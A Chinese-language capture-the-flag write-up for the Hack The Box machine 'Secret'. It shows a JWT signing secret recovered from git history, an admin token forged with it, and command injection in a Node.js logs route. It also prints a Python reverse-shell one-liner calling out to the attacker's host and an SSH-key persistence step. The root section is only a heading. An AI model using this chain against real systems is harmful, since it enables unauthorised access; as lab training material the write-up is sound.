https://app.hackthebox.com/machines/408
前期工作
nmap扫描结果
在docs目录介绍了如何调试api,而3000端口是用于api调试的,使用postman进行api调试
注意格式选择JSON而不是TEXT
1
|
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNiMTcwMjljNmRlNzA0NWNmMzQxNmUiLCJuYW1lIjoibWkzYWthIiwiZW1haWwiOiJtaTNha2FAbWkzYWthLmNvbSIsImlhdCI6MTY0ODAzOTgyOX0.J0uPhnjO3JNsdsPOoNd-gKbgU_d-voRaHp6BlR7Nc04
|
-
尝试将HS256修改成None,无果
-
从http://10.10.11.120/download/files.zip下载源码,尝试从源码中寻找对称加密密钥
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
//routes/auth.js
router.post('/login', async (req , res) => {
const { error } = loginValidation(req.body)
if (error) return res.status(400).send(error.details[0].message);
// check if email is okay
const user = await User.findOne({ email: req.body.email })
if (!user) return res.status(400).send('Email is wrong');
// check password
const validPass = await bcrypt.compare(req.body.password, user.password)
if (!validPass) return res.status(400).send('Password is wrong');
// create jwt
const token = jwt.sign({ _id: user.id, name: user.name , email: user.email}, process.env.TOKEN_SECRET )
res.header('auth-token', token).send(token);
})
|
1
2
3
4
|
//.env
DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret
|
但是经过验证这个TOKEN_SECRET不正确
列了一下目录,发现存在.git目录,尝试恢复git记录
git log查看
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
commit e297a2797a5f62b6011654cf6fb6ccb6712d2d5b (HEAD -> master)
Author: dasithsv <[email protected]>
Date: Thu Sep 9 00:03:27 2021 +0530
now we can view logs from server 😃
commit 67d8da7a0e53d8fadeb6b36396d86cdcd4f6ec78
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:30:17 2021 +0530
removed .env for security reasons
commit de0a46b5107a2f4d26e348303e76d85ae4870934
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:29:19 2021 +0530
added /downloads
commit 4e5547295cfe456d8ca7005cb823e1101fd1f9cb
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:27:35 2021 +0530
removed swap
commit 3a367e735ee76569664bf7754eaaade7c735d702
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:26:39 2021 +0530
added downloads
commit 55fe756a29268f9b4e786ae468952ca4a8df1bd8
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:25:52 2021 +0530
first commit
|
git log -p显示每次提交所引入的差异
1
2
|
-TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
+TOKEN_SECRET = secret
|
1
|
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNiMTcwMjljNmRlNzA0NWNmMzQxNmUiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6Im1pM2FrYUBtaTNha2EuY29tIiwiaWF0IjoxNjQ4MDM5ODI5fQ.iXPlMOgNzfMI5PpQrJsb8pxK93FlHDMIDMw4_aiVlRk
|
获取user权限
存在命令注入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
//routes/private.js
router.get('/logs', verifytoken, (req, res) => {
const file = req.query.file;
const userinfo = { name: req.user }
const name = userinfo.name.name;
if (name == 'theadmin'){
const getLogs = `git log --oneline ${file}`;
exec(getLogs, (err , output) =>{
if(err){
res.status(500).send(err);
return
}
res.json(output);
})
}
else{
res.json({
role: {
role: "you are normal user",
desc: userinfo.name.name
}
})
}
})
|
1
|
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.16.20",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
|
在.ssh/authorized_keys加个公钥即可使用ssh链接
获取root权限
